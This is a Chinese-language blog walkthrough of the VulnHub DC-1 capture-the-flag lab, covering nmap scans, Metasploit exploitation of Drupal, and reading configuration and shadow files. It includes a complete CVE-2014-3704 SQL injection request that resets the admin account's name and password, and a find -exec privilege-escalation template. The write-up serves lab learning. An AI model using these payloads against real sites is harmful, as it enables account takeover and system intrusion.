vulnhub dc1 靶场实战

发表于 更新于 分类于 阅读次数: Valine: 本文字数: 925 阅读时长 ≈ 2 分钟

https://download.vulnhub.com/dc/DC-1.zip

flag1

我丢,连个账号密码也不告诉,后来才发现就是这样的,打靶的嘛,告诉你了还打个der

image-20220306190153899

1
nmap -sP 192.168.123.1/24

经过筛选,此主机的IP为 192.168.123.195

再看看端口

1
nmap -sS 192.168.123.195

image-20220306191531966

有80端口,访问一下

image-20220324151118006

好家伙,网站类型drupal,在msf里面搜一下看看有没有可利用的漏洞

好爽,有7个

image-20220324151349338

挨个挨个试一试

第二个就拿到了shell,只不过只是www-data的权限,仅此网站的权限而已

image-20220324151732142

ls 发现了flag1.txt

image-20220324151816454

flag2

在这里告诉了我们关键词 config ,所以网站目录扫一下,看看配置文件含有config字样的,

image-20220324152138342

人傻了,这里面什么信息也没有,后来才知道提示的意思是查看配置文件,这个配置文件不一定是config命名的

好家伙,然后去网上搜索了一下drupal 这个cms 的默认配置文件在什么地方

查出在/www/sites/default/settings.php 这里,settings.php就是配置文件

在配置文件中发现了数据库的库名,数据库账号密码,数据库类型

image-20220324152637897

那么就登录数据库看看,无奈登录不上去

image-20220324154538239

只有找其他思路了,去搜一下

发现了另一个drupal的漏洞

flag3

cve-2014-3704 这个漏洞是sql注入,能直接数据库添加用户名和密码

拦截登录包,发到repeater

更改主体内容为

1
name[0%20;update+users+set+name%3d'roots'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in

这里我添加的用户名为roots,密码是已经经过加盐加密后的,密码为thanks

image-20220324183858081

然后在网站中登录,发现了flag3

image-20220324184140912

flag4

关键词shadow,让我想起了etc下面的passwd和shadow

查看一波,发现了flag4用户

image-20220324190914482

说明存在flag4用户,那么直接先进入flag4用户里去看一看

发现了flag4.txt,查看一下

image-20220324191631657

需要提权到root才能拿到最终的flag啊

flag4

在这里还是使用find提权

1
2
touch abc     #在tmp目录下创建abc文件夹 
find abc -exec 命令 \;

发现root目录下有最终的flag

image-20220324192017853

继续利用find来提权查看内容

image-20220324192100939

总结:

  1. 拿到网站后,可以利用msf去搜一下有没有关于这个网站cms的漏洞,也可以去搜索引擎上搜索一下关于这个cms的漏洞
  2. 思路放开一点,不能死扣flag里提示的内容,可以换个方向思考一下,在找setting中入了个坑
  3. 学到了利用find进行提权,可以多掌握一点提权的姿势